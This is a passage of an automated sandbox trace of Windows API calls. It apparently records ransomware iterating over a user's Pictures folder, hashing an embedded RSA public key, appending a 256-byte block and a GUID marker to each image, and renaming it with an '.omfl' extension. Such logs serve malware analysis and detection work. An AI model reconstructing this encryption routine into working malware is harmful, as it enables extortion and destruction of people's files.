lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.580] CloseHandle (hObject=0x6e4) returned 1 [0131.584] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.584] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.585] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GqW3Nf.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gqw3nf.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GqW3Nf.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gqw3nf.bmp.omfl")) returned 1 [0131.586] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29094f80, ftCreationTime.dwHighDateTime=0x1d5daa6, ftLastAccessTime.dwLowDateTime=0xface4940, ftLastAccessTime.dwHighDateTime=0x1d5e4be, ftLastWriteTime.dwLowDateTime=0xface4940, ftLastWriteTime.dwHighDateTime=0x1d5e4be, nFileSizeHigh=0x0, nFileSizeLow=0x153a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K6EplRx DH.bmp", cAlternateFileName="K6EPLR~1.BMP")) returned 1 [0131.586] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.586] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.586] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K6EplRx DH.bmp") returned=".bmp" [0131.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K6EplRx DH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k6eplrx dh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.587] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=86951) returned 1 [0131.587] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.590] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x15381, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.590] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.591] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.591] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x153a7, lpOverlapped=0x0) returned 1 [0131.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.592] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.592] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.593] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.593] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.593] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.593] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.593] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.593] GetLastError () returned 0x0 [0131.593] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.593] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.593] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.593] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.593] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.593] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.594] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.594] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.595] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x153a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.595] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.595] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.595] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.595] CloseHandle (hObject=0x6e4) returned 1 [0131.597] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.597] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.597] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K6EplRx DH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k6eplrx dh.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K6EplRx DH.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k6eplrx dh.bmp.omfl")) returned 1 [0131.599] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9924c0c0, ftCreationTime.dwHighDateTime=0x1d5e0db, ftLastAccessTime.dwLowDateTime=0xe87dbd20, ftLastAccessTime.dwHighDateTime=0x1d5e806, ftLastWriteTime.dwLowDateTime=0xe87dbd20, ftLastWriteTime.dwHighDateTime=0x1d5e806, nFileSizeHigh=0x0, nFileSizeLow=0xc7f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nIHH9.gif", cAlternateFileName="")) returned 1 [0131.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.599] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nIHH9.gif") returned=".gif" [0131.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nIHH9.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nihh9.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.600] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=51185) returned 1 [0131.600] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.603] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0xc7cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.603] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.604] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xc7f1, lpOverlapped=0x0) returned 1 [0131.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.604] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.605] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.605] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.605] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.605] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.605] GetLastError () returned 0x0 [0131.606] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.606] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.606] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.606] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.606] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.606] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.611] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0xc7f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.611] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.611] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.611] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.611] CloseHandle (hObject=0x6e4) returned 1 [0131.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nIHH9.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nihh9.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nIHH9.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nihh9.gif.omfl")) returned 1 [0131.615] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa82eea10, ftCreationTime.dwHighDateTime=0x1d5e3aa, ftLastAccessTime.dwLowDateTime=0x29fc0820, ftLastAccessTime.dwHighDateTime=0x1d5e031, ftLastWriteTime.dwLowDateTime=0x29fc0820, ftLastWriteTime.dwHighDateTime=0x1d5e031, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqYhvBjGVsjCxavcn", cAlternateFileName="SQYHVB~1")) returned 1 [0131.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2ef0 [0131.615] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4adad80, ftCreationTime.dwHighDateTime=0x1d5dd79, ftLastAccessTime.dwLowDateTime=0x95015e60, ftLastAccessTime.dwHighDateTime=0x1d5d99f, ftLastWriteTime.dwLowDateTime=0x95015e60, ftLastWriteTime.dwHighDateTime=0x1d5d99f, nFileSizeHigh=0x0, nFileSizeLow=0xa21a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SROKmP.gif", cAlternateFileName="")) returned 1 [0131.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757be00 [0131.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.615] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SROKmP.gif") returned=".gif" [0131.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SROKmP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\srokmp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.615] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=41498) returned 1 [0131.615] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.618] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0xa1f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.618] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.619] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.619] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xa21a, lpOverlapped=0x0) returned 1 [0131.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.620] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.620] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.621] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.621] CryptHashData (hHash=0xdce3bf0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.621] CryptGetHashParam (in: hHash=0xdce3bf0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.621] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cf128 [0131.621] CryptGetHashParam (in: hHash=0xdce3bf0, dwParam=0x2, pbData=0x74cf128, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cf128, pdwDataLen=0xe00fa54) returned 1 [0131.621] GetLastError () returned 0x0 [0131.621] CryptDestroyHash (hHash=0xdce3bf0) returned 1 [0131.621] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.621] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.621] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.621] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cab8 [0131.621] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.622] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.622] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.622] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0xa21a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.622] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.622] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.623] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.623] CloseHandle (hObject=0x6e4) returned 1 [0131.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.627] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SROKmP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\srokmp.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SROKmP.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\srokmp.gif.omfl")) returned 1 [0131.629] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d84430, ftCreationTime.dwHighDateTime=0x1d5db58, ftLastAccessTime.dwLowDateTime=0xdb393060, ftLastAccessTime.dwHighDateTime=0x1d5dedb, ftLastWriteTime.dwLowDateTime=0xdb393060, ftLastWriteTime.dwHighDateTime=0x1d5dedb, nFileSizeHigh=0x0, nFileSizeLow=0x6df0, dwReserved0=0xa0000003, dwReserved1=0x0, 